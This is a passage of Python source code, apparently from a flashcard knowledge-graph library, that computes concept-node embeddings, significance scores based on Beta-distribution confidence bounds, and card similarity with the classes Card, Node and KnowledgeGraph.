Second, after summing the resulting embedding vector, from all the concepts in the card.\n When a node is highly referenced, we normalize its entry by the total amount of embedding pointing at it\n to get the fraction of all embedding pointing at this concept from unique aspects of the card \n This once again makes the card embedding sensitive mostly to unique values\n \"\"\"\n\n # Gather list of all keys from all the component nodes, to use in the resulting embedding\n node_title_set = set()\n for node_title in node_title_list:\n node = knowledgeGraph.nodes[node_title]\n node_title_set.update(set(node.embedding_vector.keys()))\n\n # Initialize emb vec to 0 for all keys \n union_emb_vec_prenorm = {neighbor_concept: 0.0 for neighbor_concept in node_title_set} \n\n # loop through embedding vectors of each of the nodes and add weighted value to existing value\n for node_index, node_title in enumerate(node_title_list):\n # note we use the list here, so if duplicates exist, they are intentionally counted more\n node = knowledgeGraph.nodes[node_title]\n effective_node_size_correction = 1.0 / (1.0 + node.sum_of_embeddings_to_node) \n for neighbor_concept, emb_value in node.embedding_vector.items():\n union_emb_vec_prenorm[neighbor_concept] += emb_value * effective_node_size_correction\n\n # Now loop through and divide each individual embedding item by the total number of references to it\n union_emb_vec = {k: val_prenorm / (1.0 + knowledgeGraph.nodes[k].sum_of_embeddings_to_node) \n for k, val_prenorm in union_emb_vec_prenorm.items()} \n\n # Finally, normalize the embedding vector to sum to 1\n # We do this because we want a similarity metric that isn't biased toward sums of many nodes.\n total_emb_vec = np.sum(list(union_emb_vec.values()))\n union_emb_vec = {k: v / total_emb_vec for k, v in union_emb_vec.items()} \n \n return union_emb_vec\n\n\ndef emb_vec_intersection_with_threshold(emb_vec_list, knowledgeGraph, intersection_threshold_amount=1e-10):\n \"\"\"\n Takes a set of embedding vectors, and gets the geometric average of their values for each key, \n It sets values to a lower threshold if they are not present in the vector. \n \n If a set of vectors have no intersection, it returns a uniform distribution over all keys\n Someday might want to update this to return the background distribution, rather than uniform.\n \n At the end, it normalizes the resulting vector to sum to 1. \n \n This is like averaging the logit values if we think of the embedding vector as output by a softmax dist.\n \n \"\"\"\n\n def get_emb_vec_lower_threshold_value(emb_vec, \n embedding_vector_tolerance_fraction=trimming_and_intersection_tolerance_amount):\n \"\"\"\n Returns the value in the vector where the cumulative sum of elements larger than this equals\n 1 - embedding_vector_tolerance_fraction. 
So most of them.\n \"\"\"\n\n emb_vec_vals = np.array(list(emb_vec.values()))\n emb_vec_vals.sort() # from low to high \n emb_vec_cumulative_threshold = np.sum(emb_vec_vals) * embedding_vector_tolerance_fraction\n\n emb_vec_vals_sorted_cumsum = np.cumsum(emb_vec_vals)\n num_below_threshold = len(np.where(emb_vec_vals_sorted_cumsum < emb_vec_cumulative_threshold)[0])\n if num_below_threshold > 0:\n threshold_val = emb_vec_vals[num_below_threshold - 1] \n else:\n threshold_val = 0.0\n \n # If value happens to be 0, then move up through vector until it's nonzero \n while threshold_val == 0.0:\n num_below_threshold += 1\n threshold_val = emb_vec_vals[num_below_threshold] \n\n return threshold_val\n\n def get_all_keys_over_emb_vec_list(emb_vec_list):\n all_keys = set(emb_vec_list[0].keys()) # just to get started \n for emb_vec in emb_vec_list:\n all_keys = all_keys.union(set(emb_vec.keys()))\n return all_keys\n \n def get_geometric_avg_over_emb_vec_list_specific_key(emb_vec_list, lower_threshold_list, k): \n # Going to take average of logs instead of 1/nth root of product, to encourage numerical stability\n # then exponentiate the average of logs\n \n num_emb_vecs = float(len(emb_vec_list))\n \n avg_of_logs = 0.0 \n for ind_of_vec, emb_vec in enumerate(emb_vec_list):\n # Use the lower threshold value of this vector as the default \n avg_of_logs += np.log(emb_vec.get(k, lower_threshold_list[ind_of_vec])) / num_emb_vecs\n return np.exp(avg_of_logs)\n \n # Get specific keys \n all_keys = get_all_keys_over_emb_vec_list(emb_vec_list)\n \n # Get lower threshold value for each embedding vector, to be used as default if key is not contained in vector\n lower_threshold_list = [get_emb_vec_lower_threshold_value(emb_vec,\n embedding_vector_tolerance_fraction=intersection_threshold_amount\n ) for emb_vec in emb_vec_list]\n \n # Take product of values\n emb_vec_intersection = {k: get_geometric_avg_over_emb_vec_list_specific_key(emb_vec_list, lower_threshold_list, \n k) for k in all_keys}\n \n # Now renormalize it to sum to 1, if it has nonzero values \n total_emb_vec = np.sum(list(emb_vec_intersection.values()))\n if total_emb_vec != 0.0:\n emb_vec_intersection = {k: v / total_emb_vec for k, v in emb_vec_intersection.items()}\n \n return emb_vec_intersection\n\n\ndef get_emb_vec_intersection_over_concepts(concept_list, knowledgeGraph):\n \n emb_vec_list = []\n for _ind, concept in enumerate(reversed(concept_list)):\n sig_vec = knowledgeGraph.nodes[concept].significance_vector \n emb_vec = knowledgeGraph.nodes[concept].embedding_vector \n emb_vec_list.append(emb_vec)\n \n emb_vec_int = emb_vec_intersection_with_threshold(emb_vec_list, knowledgeGraph)\n\n return emb_vec_int\n\ndef get_emb_vec_relative_abstraction_1to2(emb_vec1, emb_vec2, knowledgeGraph,\n heavy_trim_tolerance_fraction=1e-1):\n\n # Get very trimmed embedding vectors\n trimmed_emb_vec1 = trim_embedding_vector(emb_vec1, \n embedding_vector_tolerance_fraction=heavy_trim_tolerance_fraction)\n trimmed_emb_vec2 = trim_embedding_vector(emb_vec2, \n embedding_vector_tolerance_fraction=heavy_trim_tolerance_fraction)\n\n # loop through and get relative abstraction based on node-to-node abstraction\n # weight each cross pair by the product of embedding vector values (then normalized by total)\n rel_abs_with_weights_sum = 0.0 \n weights_sum = 0.0 \n for node1_title, node1_emb in trimmed_emb_vec1.items():\n for node2_title, node2_emb in trimmed_emb_vec2.items():\n rel_abs_dict_1to2 = knowledgeGraph.nodes[node1_title].neighbors_relative_abstraction\n 
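# default to 0 when node2 has no recorded abstraction relative to node1\n            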
rel_abs = 0.0\n if node2_title in rel_abs_dict_1to2.keys(): \n # This is the abstraction of 2 relative to 1 \n rel_abs = rel_abs_dict_1to2[node2_title]\n rel_abs_with_weights_sum += rel_abs * node1_emb * node2_emb\n weights_sum += node1_emb * node2_emb\n\n rel_abs = rel_abs_with_weights_sum / weights_sum\n\n return rel_abs \n\nclass CardConceptHierarchy:\n \"\"\"\n A datastructure for listing the major ideas corresponding to a card, both at higher and lower abstraction levels. \n \"\"\"\n \n def __init__(self, topic=\"\", topic_description=\"\"):\n # The first key is an integer, the abstraction level. 0 is base. 1 is more abstract, -1 is less abstract \n # second dictionary is the titles and descriptions of concepts \n self.abstraction_groups: Dict[int: Dict[str, str]] = {0 : {str(topic): str(topic_description)}}\n \n def set_concept(self, relative_abstraction, title, description):\n self.abstraction_groups.setdefault(relative_abstraction, {}) # creates entry if it does not exist\n self.abstraction_groups[relative_abstraction][str(title)] = str(description)\n \n def get_concepts_list(self): # Gets unique concepts, ordered by abstraction \n ordered_concepts_nonunique = [concept for abs_level, concept_dict in reversed(sorted(self.abstraction_groups.items()))\n for concept, desc in concept_dict.items() ]\n unique_inds = np.unique(ordered_concepts_nonunique, return_index=True)[1]\n return [ordered_concepts_nonunique[_unique_ind] for _unique_ind in sorted(unique_inds)]\n \n def get_abstractions_dict(self): # returns dictionary containing unique concepts, and abstracton level \n # If concept shows up at multiple abstraction levels, then average them together. \n unique_concepts = self.get_concepts_list()\n abs_level_samples = {concept: [] for concept in unique_concepts}\n for abs_level, concept_dict in reversed(sorted(self.abstraction_groups.items())):\n for concept, desc in concept_dict.items():\n abs_level_samples[concept].append(abs_level)\n abstractions_dict = {k: np.average(np.array(v)) for k, v in abs_level_samples.items()}\n return abstractions_dict\n \n def get_abstractions_dict_as_JSON_str(self):\n\n def list_to_doublequotes(_list):\n return '[\"' + '\", \"'.join(_list) + '\"]'\n\n _list = ['\"'+str(abs_level)+'\" : '+ list_to_doublequotes(list(concept_dict.keys())) \n for abs_level, concept_dict in sorted(self.abstraction_groups.items())]\n return \"{\" + ', '.join(_list) + \"}\"\n \nclass Card:\n \"\"\"\n Each card is a question answer pair. 
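A card also stores its topic, key ideas, a concept hierarchy, and a derived embedding vector.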
\n \"\"\"\n \n def __init__(self, cardID, topic, question, answer, key_ideas, cardConceptHierarchy):\n self.cardID = cardID # a unique integer given to each card \n self.topic: str = topic # effectively the label of the card\n self.question: str = question\n self.answer: str = answer\n self.key_ideas: str = key_ideas\n self.concepts: CardConceptHierarchy = cardConceptHierarchy \n # self.retention: float = 0.0 # a number from 0 to 1 giving the estimated correctness if asked now\n # self.history: List[[float, float]] = [] # list of past times, and accuracy at that time, of testing \n \n self.embedding_vector: Dict[str: float] = {} \n self.embedding_vector_trimmed: Dict[str: float] = {} # trimmed to not be as long of a dictionary if values are tiny\n \n def get_abstraction_from_1_to_2(self, concept1, concept2):\n abstractions_dict = self.concepts.get_abstractions_dict()\n return float(abstractions_dict[concept2] - abstractions_dict[concept1])\n \n def display(self, verbose=False):\n if not verbose:\n l1 = \"Topic: \" + self.topic\n l2 = \"Question: \" + self.question + ''\n l3 = \"Answer: \" + self.answer + ''\n print(\"\\n\".join([l1,l2,l3]) + \"\\n\")\n if verbose:\n l1 = \"Topic: \" + self.topic\n l2 = \"Question: \" + self.question + ''\n l3 = \"Answer: \" + self.answer + ''\n l4 = \"Key ideas:\\n\" + self.key_ideas\n \n print(\"\\n\".join([l1, l2, l3, l4]) + \"\\n\")\n \n def update_embedding_vector(self, knowledgeGraph):\n \"\"\"\n Embedding vector for card is a weighted sum of embedding vectors for the concepts in the card \n \n Have to pass in knowledge graph as argument because card needs to know about nodes, in the knowledge graph\n \"\"\"\n \n # Card concept list\n card_concepts_list = self.concepts.get_concepts_list()\n\n card_emb_vec = emb_vec_weighted_union_of_nodes(card_concepts_list, knowledgeGraph)\n \n self.embedding_vector = card_emb_vec # update stored value, then return it \n self.embedding_vector_trimmed = trim_embedding_vector(card_emb_vec)\n \n return card_emb_vec\n\n \nclass Node:\n \"\"\"\n Each node is a concept. \n \n Main attributes are:\n title : title of node. This is the ID, and the concept of the node. Used for searching\n cards : list of the cardID of cards that touch this node \n neighbors : a dictionary of neighboring nodes, with the list of cardIDs of cards connecting them \n neighbors_relative_abstraction : a dictionary of neighboring nodes, with the list of the \n relative abstraction from node to neighbor (higher means neighbor is more abstract). 
\n neighbors_connection_strength : a dictionary of neighboring nodes, with the connection strength from this\n node to that node, from the perspective of this node (number of cards connecting to that node, out of total cards)\n \"\"\"\n \n def __init__(self, title: str):\n self.title = title\n self.cards: Set[int] = set() # contains references to card IDs that touch this node \n self.neighbors: Set[str] = set()\n self.neighbors_card_connections: Dict[str: Set[int]] = {} # contains references to neighbor nodes, and the set of IDs of cards that connect them \n self.neighbors_connection_count: Dict[str: int] = {} \n self.neighbors_connection_strength: Dict[str: float] = {} \n self.neighbors_reverse_connection_strength: Dict[str: float] = {} # from the neighbor's perspective\n \n self.neighbors_relative_abstraction: Dict[str: float] = {} \n self.significance_vector: Dict[str: float] = {} # vector of probabilities from 0 to 1 that two concepts are associated\n self.sum_of_significances_to_node: float = 0.0 \n self.sum_of_significances_from_node: float = 0.0 \n \n self.raw_embedding_vector: Dict[str: float] = {} # vector of association strengths from significance and connection\n self.sum_of_raw_embeddings_to_node: float = 0.0 \n \n self.embedding_vector: Dict[str: float] = {} # vector of network-wise association strengths \n self.embedding_vector_trimmed: Dict[str: float] = {} # trimmed to not be as long of a dictionary if values are tiny\n self.sum_of_embeddings_to_node: float = 0.0 # sum of all other node embedding vectors values of this node\n\n def display_raw_metrics(self, num_connections_required_for_display=1):\n strength_bar_size_display = 20 # width in number of characters \n rel_abs_bar_size_display = 20\n display_title = (\"-------------------------------------------------------------------------\\n\"+\n \"Relative Abstracton Connection Strength Rev. Conn. 
Strength Concept\\n\"+\n \"-------------------------------------------------------------------------\")\n sorted_relative_abstraction = dict(reversed(sorted(self.neighbors_relative_abstraction.items(), key=lambda item: item[1])))\n rel_abs_scale = np.max(np.abs(np.array(list(sorted_relative_abstraction.values())))) + 1e-13 # to prevent 0 scale\n\n print(\"Node:\", self.title)\n print(\" {} cards\".format(len(self.cards)))\n print(\" {} card threshold for display\".format(num_connections_required_for_display))\n print(display_title)\n for neighbor_node_title, rel_abs in sorted_relative_abstraction.items():\n connection_strength = self.neighbors_connection_strength[neighbor_node_title]\n reverse_connection_strength = self.neighbors_reverse_connection_strength[neighbor_node_title]\n connection_count = self.neighbors_connection_count[neighbor_node_title]\n rel_abs_display_scale = rel_abs/rel_abs_scale\n\n if connection_strength >= min(self.neighbors_connection_strength.values())*num_connections_required_for_display:\n strength_bar = get_visual_display_bar_positive(connection_strength, strength_bar_size_display) \n reverse_strength_bar = get_visual_display_bar_positive(reverse_connection_strength, strength_bar_size_display) \n rel_abs_bar = get_visual_display_bar_symmetric(rel_abs_display_scale, rel_abs_bar_size_display)\n \n print(rel_abs_bar, strength_bar, reverse_strength_bar, neighbor_node_title, ' ', connection_count)\n \n def get_neighbor_titles_with_similar_abstraction(self, abstraction_window_plus_minus=0.5):\n n_node_title_list = [n_node_title for n_node_title in self.neighbors\n if np.abs(self.neighbors_relative_abstraction[n_node_title]) < abstraction_window_plus_minus]\n return n_node_title_list\n\n def get_sorted_neighbor_titles_by_abstraction(self):\n sorted_neighbor_titles = [str(k) for [k, v] in list(sorted(self.neighbors_relative_abstraction.items(), \n key=lambda item: item[1]))]\n return np.array(sorted_neighbor_titles)\n\n def dict_to_array(self, _dict):\n sorted_neighbor_titles = self.get_sorted_neighbor_titles_by_abstraction()\n return np.array([_dict[title] for title in sorted_neighbor_titles])\n \n def _get_predicted_connection_strength(self, abstraction_window_plus_minus_for_avg=1.501):\n \"\"\"\n This defines a window around each unique abstraction value, and calculates the average connection strength\n and number of samples in that window\n\n Returns two dictionaries for all datapoints (neighbors) contiaining the value, and sample count\n \"\"\"\n\n def get_avg_connection_strength_in_abstraction_window(node, _low, _high):\n con_samples = [node.neighbors_connection_strength[_title] for _title in node.neighbors\n if (node.neighbors_relative_abstraction[_title] <= _high and \n node.neighbors_relative_abstraction[_title] >= _low)\n ]\n num_con_samples = len(con_samples)\n avg_con_val = np.average(np.array(con_samples))\n return avg_con_val, num_con_samples\n\n def get_avg_connection_strength_near_abstraction_value(node, abs_val):\n abs_window = [abs_val - abstraction_window_plus_minus_for_avg, abs_val + abstraction_window_plus_minus_for_avg]\n avg_connection_val, num_samples = get_avg_connection_strength_in_abstraction_window(node, abs_window[0], abs_window[1])\n return [avg_connection_val, num_samples]\n \n def get_avg_connection_strength_vs_unique_abstractions(node, unique_abstraction_vals):\n avg_connection_vals_and_num_samples = np.array([get_avg_connection_strength_near_abstraction_value(node, abs_val) \n for abs_val in unique_abstraction_vals])\n avg_connection_vals 
= avg_connection_vals_and_num_samples[:,0]\n num_sample_cards = len(node.cards) * avg_connection_vals_and_num_samples[:,1]\n return avg_connection_vals, num_sample_cards\n\n node = self\n unique_abstraction_vals = sorted(list(set(node.neighbors_relative_abstraction.values())))\n avg_connection_vals, num_sample_cards = get_avg_connection_strength_vs_unique_abstractions(node, unique_abstraction_vals)\n # Note, num_sample_cards is the number of total cards involved in the averaging\n # so it's the number of words averaged together, times the number of cards in the node \n \n if len(unique_abstraction_vals) > 1:\n # get interpolations\n avg_connection_vals_interp = scipy.interpolate.interp1d(unique_abstraction_vals, avg_connection_vals, kind=\"linear\")\n num_sample_cards_interp = scipy.interpolate.interp1d(unique_abstraction_vals, num_sample_cards, kind=\"linear\")\n\n # Evaluate for all data points \n pred_val_dict = {_title: avg_connection_vals_interp(node.neighbors_relative_abstraction[_title]) \n for _title in node.neighbors}\n num_samples_dict = {_title: num_sample_cards_interp(node.neighbors_relative_abstraction[_title]) \n for _title in node.neighbors}\n else: # there is just one value\n pred_val_dict = {_title: avg_connection_vals[0] for _title in node.neighbors}\n num_samples_dict = {_title: num_sample_cards[0] for _title in node.neighbors}\n\n return pred_val_dict, num_samples_dict\n\n def _calculate_LCB_association_significance(self, con_str, con_str_num_cards, pred_con_str, \n pred_con_str_num_cards, lower_bound_epsilon=0.025):\n # Gets lower confidence bound for whether these concepts are significantly associated\n \n def get_beta_LCB(fraction_observed, n_measurements, lower_bound_epsilon):\n # beta.ppf is the inverse of the cdf distribution\n # it gives the value of the input to the beta distribution with these parameters where\n # the probability of fraction_observed being lower than this is lower_bound_epsilon\n\n prior_alpha = 1.0\n prior_beta = 1.0\n\n n_observed = fraction_observed * n_measurements\n lower_bound_value = scipy.stats.beta.ppf(lower_bound_epsilon, prior_alpha + n_observed, \n prior_beta + n_measurements - n_observed)\n\n return lower_bound_value\n\n def get_beta_cdf(test_value, n_measurements, pred_value):\n prior_alpha = 1.0\n prior_beta = 1.0\n\n pred_n_observed = pred_value * n_measurements\n cdf_probability = scipy.stats.beta.cdf(test_value, prior_alpha + pred_n_observed, \n prior_beta + n_measurements - pred_n_observed)\n return cdf_probability\n\n def get_probability_score(connection_strength, n_cards_for_connection, pred_connection_strength, \n n_cards_for_prediction, lower_bound_epsilon=0.025):\n lower_bound_value = get_beta_LCB(connection_strength, n_cards_for_connection, lower_bound_epsilon)\n cdf_probability = get_beta_cdf(lower_bound_value, n_cards_for_prediction, pred_connection_strength)\n return cdf_probability\n\n prob_score = get_probability_score(con_str, con_str_num_cards, pred_con_str, pred_con_str_num_cards, lower_bound_epsilon)\n return prob_score\n\n\n def update_significance_vector(self, abstraction_window_plus_minus_for_avg=1.51,\n lower_bound_epsilon=0.025):\n \"\"\"\n Gets a detailed metric for the connection strength from this node to others.\n This metric is based on the lower confidence bound for association strength.\n \n Returns a dictionary with this score\n Does not include self in dictionary. 
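Values near 1 indicate that the observed\n        connection strength significantly exceeds the abstraction-matched baseline.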
\n \"\"\"\n\n window_pm = abstraction_window_plus_minus_for_avg\n num_cards = len(self.cards) # number of cards touching this node \n predicted_con_str, num_sample_cards = self._get_predicted_connection_strength(window_pm)\n con_str = self.neighbors_connection_strength\n \n significance_vector = {_title: self._calculate_LCB_association_significance(con_str[_title], num_cards, \n predicted_con_str[_title], \n num_sample_cards[_title], \n lower_bound_epsilon)\n for _title in self.neighbors}\n \n self.significance_vector = significance_vector # update stored value\n self.sum_of_significances_from_node = np.sum(list(self.significance_vector.values()))\n \n return None\n \n def update_raw_embedding_vector(self, abstraction_window_plus_minus_for_avg=1.51,\n lower_bound_epsilon=0.025):\n self.update_significance_vector()\n \n # Now use significance vector and number of shared edges to associate concepts \n self.raw_embedding_vector = {k: v * self.significance_vector[k]\n for k, v in self.neighbors_connection_strength.items()}\n \n return self.raw_embedding_vector\n\nclass KnowledgeGraph:\n \"\"\"\n Will contain a dictionary of nodes of the graph, and a dictionary of cards in the graph which connect the nodes.\n \n Initialization process is create card, then add it to graph, then add to nodes, then update nodes based on card properties \n \"\"\"\n \n def __init__(\n self,\n lower_bound_epsilon=0.05, # the significance level for determining if nodes are associated \n ):\n self.nodes: Dict[str: Node ] = {} \n self.cards: Dict[int: Card ] = {} \n self.lower_bound_epsilon = lower_bound_epsilon\n \n self.node_embedding_num_maximum_passes_through_network = 100\n # Sets maximum number of times we'll loop through network when calculating node embedding\n self.node_embedding_update_fraction_condition_for_node_embedding_convergence = 0.01 \n # smaller threshold means slower convergence but more accuracy\n self.node_embedding_update_combination_power = 6 \n # higher power means change node embedding more slowly \n # This leads to slower convergence, but better averaging over nodes\n \n def _add_card(self, topic, question, answer, key_ideas, cardConceptHierarchy):\n # initialize card\n newCardID = 1 + max(list(self.cards.keys()) + [-1]) # get max value plus one \n card = Card(newCardID, topic, question, answer, key_ideas, cardConceptHierarchy)\n self.cards[newCardID] = card\n \n self._update_node_parameters_when_adding_card(card)\n \n node_titles_updated = set(card.concepts.get_concepts_list())\n return node_titles_updated\n \n def _update_node_parameters_when_adding_card(self, card):\n \"\"\"\n # Adds nodes if necessary.\n Updates \n node.cards set, \n node.neighbors set of nodes, \n node.neighbors_card_connections dictionary of cards to each node\n node.neighbors_connection_count dictionary of number of cards connecting to each node\n node.neighbors_connection_strength float of fraction of times mentioned together\n node.neighbors_reverse_connection_strength float of reverse connection (from neighbors perspective)\n \"\"\"\n \n node_titles_to_update = list(set(card.concepts.get_concepts_list())) # remove duplicates\n for node_title in node_titles_to_update: \n node = self.nodes.setdefault(node_title, Node(node_title)) # creates node it if not existing yet\n node.cards.add(card.cardID) # Update card set for this node to include current card\n neighbor_node_titles_to_update = [title for title in node_titles_to_update \n if title != node_title] # gather list of others only\n \n for n_node_title in 
neighbor_node_titles_to_update:\n node.neighbors.add(n_node_title)\n \n # Update card connection set. Have to add default in case we never connected before\n card_connections = node.neighbors_card_connections.setdefault(n_node_title, set())\n card_connections.add(card.cardID)\n node.neighbors_connection_count[n_node_title] = len(card_connections)\n \n # For connection strength, we have to iterate over all neighbors of the node\n for n_node_title in node.neighbors_card_connections.keys():\n connection_strength = float(node.neighbors_connection_count[n_node_title])/len(node.cards)\n node.neighbors_connection_strength[n_node_title] = connection_strength\n\n # Finally update the stored reverse connection strengths (it's not a symmetric metric)\n for node_title in node_titles_to_update: \n node = self.nodes[node_title]\n for n_node_title in node.neighbors:\n n_node = self.nodes[n_node_title]\n n_node_strength_to_node = n_node.neighbors_connection_strength[node_title]\n node.neighbors_reverse_connection_strength[n_node_title] = n_node_strength_to_node\n \n def _get_node_neighbor_rel_abstraction_over_card_list(self, cardIDList, concept1, concept2):\n # This method is in the knowledge graph because it requires information from cards\n relative_abstractions = [self.cards[_cardID].get_abstraction_from_1_to_2(concept1, concept2)\n for _cardID in cardIDList]\n return np.average(np.array(relative_abstractions))\n \n def _recalculate_relative_abstraction(self, node_titles_to_update, verbose=False):\n # Loop through updated nodes and recalculate relative abstraction \n start_time = time.time()\n for _ind, node_title in enumerate(node_titles_to_update): \n if verbose:\n if _ind % 200 == 0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n \n node = self.nodes[node_title]\n for n_node_title in node.neighbors:\n # Update relative abstraction \n card_connections = node.neighbors_card_connections[n_node_title]\n rel_abs = self._get_node_neighbor_rel_abstraction_over_card_list(card_connections, \n node_title, n_node_title)\n node.neighbors_relative_abstraction[n_node_title] = rel_abs\n \n def add_card_deck(self, card_deck, verbose=False):\n # card_deck is a list of card meta data for input to add_card\n \n # Add basic info of cards \n node_titles_updated = set()\n for card_data in card_deck:\n node_titles_updated_this_card = self._add_card(*card_data)\n node_titles_updated.update(node_titles_updated_this_card)\n \n # Loop through updated nodes and recalculate relative abstraction \n print(\"Recalculating relative abstraction\") if verbose else None\n self._recalculate_relative_abstraction(node_titles_updated, verbose=verbose)\n \n # Update raw embedding vector for these nodes\n print(\"Updating raw embedding vectors\") if verbose else None\n start_time = time.time()\n for _ind, node_title in enumerate(node_titles_updated):\n if verbose and _ind % 200 == 0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n self.nodes[node_title].update_raw_embedding_vector(lower_bound_epsilon=self.lower_bound_epsilon)\n \n # Update all counts of significances to each node. 
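Both significance and raw-embedding totals are refreshed.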
This should be fast, so do it over whole graph\n for node in self.nodes.values():\n node.sum_of_significances_to_node = 0.0 \n node.sum_of_raw_embeddings_to_node = 0.0 \n for k, v in node.significance_vector.items():\n node.sum_of_significances_to_node += v\n for k, v in node.raw_embedding_vector.items():\n node.sum_of_raw_embeddings_to_node += v\n \n return node_titles_updated\n \n def update_all_node_embeddings(self,\n allow_reusing_existing_node_embedding=True, # saves computation a ton\n verbose=False,\n ):\n \"\"\"\n Get embedding vectors from raw embeddings \n This effectively measures and builds the network connectivity based on global structure\n Final embedding to neighbor gets increased if neighbors share many mutual neighbors \n \"\"\"\n\n num_maximum_passes_through_network = self.node_embedding_num_maximum_passes_through_network\n update_fraction_condition_for_node_embedding_convergence = self.node_embedding_update_fraction_condition_for_node_embedding_convergence\n update_combination_power = self.node_embedding_update_combination_power\n\n # Use trimmed raw embedding vectors of other nodes for calculating overlap \n # This speeds up computation by 10x roughly\n raw_embedding_vectors_trimmed = {node_title: trim_embedding_vector(node.raw_embedding_vector)\n for node_title, node in self.nodes.items()}\n\n node_titles_and_sum_of_sigs = self.get_node_titles_and_sum_of_significances_to_node_decreasing_order()\n\n if verbose:\n print('Updating all node embeddings:')\n start_time = time.time()\n for _ind, (node_title, sum_of_sigs) in enumerate(node_titles_and_sum_of_sigs):\n if verbose:\n if _ind % 200 == 0 or time.time() - prev_time > 1.0:\n print(' Node number: ', _ind, ', Title: \"{}\" at time '.format(node_title), \n np.round(time.time() - start_time,2))\n prev_time = time.time()\n\n node = self.nodes[node_title]\n\n # Get order to loop through neighbors\n # Want to loop through by order of raw embedding in relation to this card, least embedding first. \n ordering_dict = node.raw_embedding_vector\n sort_inds = np.argsort(list(ordering_dict.values()))\n sorted_neighbor_names = np.array(list(ordering_dict.keys()))[sort_inds] \n\n # Initialize embedding vector \n if len(node.embedding_vector) > 0 and allow_reusing_existing_node_embedding:\n new_emb_vec = node.raw_embedding_vector.copy() # have to copy because we maybe introduced new elements \n new_emb_vec.update(node.embedding_vector.copy()) # uses old embedding vector as default values\n else:\n new_emb_vec = node.raw_embedding_vector.copy() # to be filled \n new_emb_vec_current_total = np.sum(list(new_emb_vec.values())) \n # Keep track of vector running sum rather than recalculating inner product (which is slow)\n\n # Loop through nodes and update embedding\n # need to do multiple passes over all nodes to converge to a new node representation. 
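Convergence is\n            # declared once the per-pass update fraction falls below the configured threshold.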
\n for pass_ind in range(num_maximum_passes_through_network): \n total_update_this_pass = 0.0 # keep track how much we have updated, to check convergence\n for n_node_title in sorted_neighbor_names: \n n_node_raw_emb_vec_trimmed = raw_embedding_vectors_trimmed[n_node_title]\n n_node_raw_emb_sum_to_n_node = self.nodes[n_node_title].sum_of_raw_embeddings_to_node \n\n # Calculate normalized overlap (this is like the new target embedding)\n overlap = min(1, emb_vec_inner_product(new_emb_vec, n_node_raw_emb_vec_trimmed) / \n new_emb_vec_current_total)\n # Want to rotate slowly to new overlap, so average strongly with previous value\n overlap_reduced = ((overlap * new_emb_vec[n_node_title] ** (update_combination_power - 1)) \n ** (1.0/ update_combination_power))\n updated_value = overlap_reduced / (1.0 + n_node_raw_emb_sum_to_n_node) \n # The denominator kills major concepts, since they're not very useful for embedding\n\n # Update parameters \n total_update_this_pass += np.abs(updated_value - new_emb_vec[n_node_title])\n new_emb_vec_current_total += updated_value - new_emb_vec[n_node_title]\n new_emb_vec[n_node_title] = updated_value\n\n # Check for convergence and break if done\n if ((total_update_this_pass / new_emb_vec_current_total) \n < update_fraction_condition_for_node_embedding_convergence):\n break \n\n node.embedding_vector = new_emb_vec\n node.embedding_vector_trimmed = trim_embedding_vector(new_emb_vec)\n \n # Update the sum of embeddings to each node\n for node in self.nodes.values():\n node.sum_of_embeddings_to_node = 0.0\n for k, v in node.embedding_vector.items():\n node.sum_of_embeddings_to_node += v\n \n def update_all_embeddings(self,\n allow_reusing_existing_node_embedding=True, # saves computation a ton\n verbose=False,\n ):\n \n # Update all nodes\n self.update_all_node_embeddings(allow_reusing_existing_node_embedding=allow_reusing_existing_node_embedding,\n verbose=verbose)\n \n # Update all cards \n for card in self.cards.values():\n card.update_embedding_vector(self)\n \n def get_node_titles_and_sum_of_significances_to_node_decreasing_order(self):\n node_titles_and_sum_of_significances_to_node = [(node.title, node.sum_of_significances_to_node) for node in self.nodes.values()] \n sum_of_significances_to_node = [node.sum_of_significances_to_node for node in self.nodes.values()] \n sum_of_significances_to_node_sorted_inds = np.flip(np.argsort(np.array(sum_of_significances_to_node)))\n sorted_node_titles_and_sum_of_significances_to_node = np.array(node_titles_and_sum_of_significances_to_node)[sum_of_significances_to_node_sorted_inds]\n return sorted_node_titles_and_sum_of_significances_to_node\n\n def get_dict_of_emb_vec_inner_product_over_nodes(self, emb_vec, useTrimmed=True):\n if useTrimmed:\n overlap_dict = {node_title: emb_vec_inner_product(emb_vec, node.embedding_vector_trimmed)\n for node_title, node in self.nodes.items()}\n else:\n overlap_dict = {node_title: emb_vec_inner_product(emb_vec, node.embedding_vector)\n for node_title, node in self.nodes.items()} \n return overlap_dict\n\n def get_dict_of_emb_vec_inner_product_over_cards(self, emb_vec, useTrimmed=True):\n if useTrimmed:\n overlap_dict = {cardID: emb_vec_inner_product(emb_vec, card.embedding_vector_trimmed)\n for cardID, card in self.cards.items()}\n else:\n overlap_dict = {cardID: emb_vec_inner_product(emb_vec, card.embedding_vector)\n for cardID, card in self.cards.items()}\n return overlap_dict\n \n def display_object_overlaps(self, input_object):\n # input_object should be a node or card\n\n if 
isinstance(input_object, Node):\n object_type = 'Node'\n object_title = input_object.title\n emb_vec = input_object.embedding_vector\n elif isinstance(input_object, Card):\n object_type = 'Card'\n object_title = input_object.topic + \" ID:\" + str(input_object.cardID)\n emb_vec = input_object.embedding_vector\n else:\n raise Exception(\"Trying to display an object that is not allowed\")\n\n overlap_dict_nodes = self.get_dict_of_emb_vec_inner_product_over_nodes(emb_vec)\n overlap_dict_cards = self.get_dict_of_emb_vec_inner_product_over_cards(emb_vec)\n\n sorted_node_titles, sorted_node_overlaps = get_dict_items_sorted_by_decreasing_value(overlap_dict_nodes)\n sorted_cardIDs, sorted_card_overlaps = get_dict_items_sorted_by_decreasing_value(overlap_dict_cards)\n\n def plot_overlaps_vs_names(xvals, yvals, xlabel, title, num_display):\n fig, ax = plt.subplots(1, figsize=(12, 2))\n ax.set_title(title)\n ax.scatter(xvals[0:num_display], yvals[0:num_display], marker = 'o', color = 'blue', s=4, label='')\n ax.set_xlabel(xlabel)\n ax.set_ylabel('Overlap')\n plt.xticks(rotation=85)\n plt.ylim([0,1.05*np.max(yvals[0:num_display])])\n plt.show()\n\n def plot_overlaps_histograms(node_overlaps, card_overlaps, title, num_bins=40):\n fig, ax = plt.subplots(1, 2, figsize=(8, 2))\n ax[0].hist(node_overlaps, bins=num_bins)\n ax[0].set_xlabel('Node overlap')\n ax[0].set_ylabel('Counts')\n ax[0].set_yscale('log')\n ax[1].hist(card_overlaps, bins=num_bins)\n 